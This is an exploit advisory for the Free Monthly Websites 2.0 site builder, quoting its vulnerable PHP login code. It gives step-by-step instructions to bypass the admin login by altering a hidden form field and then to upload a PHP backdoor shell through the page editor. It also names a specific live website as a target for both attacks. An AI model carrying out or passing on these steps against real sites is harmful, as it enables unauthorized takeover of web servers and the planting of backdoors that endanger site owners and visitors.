标题：Free Monthly Websites 2.0 Multiple Vulnerabilities
作者 : X-Cisadane 
开发者 : http://www.freemonthlywebsites2.com/
下载地址: http://www.freemonthlywebsites2.com/downloads/fmw_oto/websites/Free_Monthly_Websites_50_Custom_Websites_MPW7199.zip
影响版本 : 2.0
缺陷: Admin Login Bypass and Shell Upload Vulnerability 
测试平台 : Google Chrome 24.0.1312.52 m (Windows XP SP 3 32-Bit English) 
 
测试证明
================ 
[ 1 ] Admin Login Bypass
  
Vulnerable page http://www.2cto.com /[path]/admin/index.php
Line 
40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
41 <input type="hidden" name="do_type" value="admin_settings_read">
  
Vulnerable page http://target.com/[path]/admin/login.php
Line
40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
41 <input type="hidden" name="do_type" value="admin_settings_read">
  
Vulnerable page http://target.com/[path]/admin/file_io.php
Line
14 if($_REQUEST[do_type]=="admin_settings_read")
15 {
16      $filename="settings/admin_settings.txt";
17
18      if(!$handle = fopen($filename, 'r'))
19      {
20              echo "Cannot open file ($filename)";
21              exit;
22      }
23      $contents = fread($handle, filesize($filename));
24      fclose($handle);
25      $argument_arr=explode("#_1_#",$contents);
26
27      if($argument_arr[0]==$_REQUEST[username] && $argument_arr[1]==$_REQUEST[pass])
28      {
29              $_SESSION[logged_in]=true;
30              header("location:welcome.php");
  
Based at line 16 we know that Admin Username and Password store in admin_settings.txt NOT on Database! 
So When we login into Admin Panel, file_io.php will Read Valid Username and Password from admin_settings.txt
If you do a direct access to the file admin_settings.txt, The results is 
  
403 Permission Denied
You do not have permission for this request /admin/settings/admin_settings.txt
Pic : http://i48.tinypic.com/2gvlwt4.png
  
  
So... How to Bypass Admin Login Page? 
1st. Open the Admin Login Page : http://target.com/[path]/admin/index.php 
Live Target : http://www.massmoneywebsites.com/admin/
  
2nd. Inspect Element on the login Form. 
Pic : http://i47.tinypic.com/2r5ddp1.png
  
3rd. Change from 
<form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form>
<input type="hidden" name="do_type" value="admin_settings_read">
  
CHANGE TO 
<form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form>
<input type="text" name="do_type" value="admin_settings_write">
Then press ENTER (please see pic).
Pic : http://i49.tinypic.com/351z3ib.png
  
4th. You will see A Login Failed Page : >> You need to login in to access that page <<
Pic : http://i50.tinypic.com/33ws8jb.png
Never Mind About that, just click 'Login Button' and VOILA you get and Admin Access!
pic : http://i45.tinypic.com/jzwpea.png
----------------------------------------
[ 2 ] Upload PHP Backdoor or PHP Shell 
  
This vulnerability works on PREMIUM VERSION of Free Monthly Websites 2.0
  
So... How to Upload Backdoor (PHP Shell)?
  
1st. Go to Add/Remove Navigation Page. 
http://target.com/[path]/admin/add_main_pages.php
Live Target : http://www.massmoneywebsites.com/admin/add_main_pages.php
  
2nd. Enter a Name For Your New Navigation Page That You Wish To Add: dwi.php 
And click Add New Navigation Page.
Pic : http://i45.tinypic.com/vigzsp.png
  
3rd. Still at the same page, scroll down the page until you see this section : Sort Your Page Buttons/Links.
Pic : http://i46.tinypic.com/1040oxg.png
Change FROM dwi.php.html TO /dwi.php then Click Sort Navigation Pages.
Pic : http://i49.tinypic.com/24ec1l0.jpg
  
4th. Go to Edit Navigation Page.
http://www.massmoneywebsites.com/admin/edit_main_pages.php
Please Select a Page To Edit: dwi.php.html <--- Select that page.
  
5th. Inspect element on dwi.php.html
Pic : http://i50.tinypic.com/29pq1ix.png
Change FROM <option value="dwi.php.html" selected="">dwi.php.html</option>
To <option value="dwi.php" selected="">dwi.php</option>
Pic : http://i47.tinypic.com/wtb0j6.png
  
6th. Enter A Page Title As You Would Like It To Be Seen. Fill with dwi.php
URL For This Page: main_pages/dwi.php 
Use the 'URL For This Page' field above: [Tick] 
Display This Page in Left Vertical Site Navigation: [Tick]
Display This Page in Top Horizontal Site Navigation Buttons: [Tick]
Pic : http://i46.tinypic.com/1zebnle.png
  
7th. Still at the same page, scroll down the page until you see this section : Enter Content For Your Page:
Click SOURCE button 
Press Enter Twice at the First Line then Paste your PHP Backdoor/PHP Shell below.
And Press Enter Twice at the Last Line.
*Please see 2 Pictures below If you dunno Understand :p
Pic 1 : http://i49.tinypic.com/1zlzxq0.png
Pic 2 : http://i48.tinypic.com/291kc9h.png
  
If you wanna do this, please Remove Your Backdoor Password.
Click Save Edited Navigation Page.
  
8th. After this message >> Data saved successfully << Appeared, Visit the Home Page and you will see the Backdoor Page
Pic : http://i49.tinypic.com/4rt1g4.png
  
//I'm sorry My English was poor